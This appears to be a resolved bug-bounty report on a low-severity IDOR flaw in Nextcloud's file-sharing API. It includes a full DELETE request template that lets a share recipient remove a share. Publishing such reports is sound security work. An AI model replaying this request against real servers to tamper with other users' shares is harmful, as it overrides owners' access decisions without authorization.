IDOR - Disable sharing
Low
N
Nextcloud
Submitted None
Actions:
Reported by
dalt4sec
Vulnerability Details
Technical details and impact analysis
Decription:
-----
Users are shared files or folder. can disable this sharing.
Detail:
------
+ use request:
DELETE /nextcloud/ocs/v2.php/apps/files_sharing/api/v1/shares/[share-id]?format=json HTTP/1.1
Host: [your-host]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken: [token of user is shared]
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Cookie: [cookie of user is shared]
Connection: keep-alive
Note:
----
only user is shared or user in group is shared can do it
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Privilege Escalation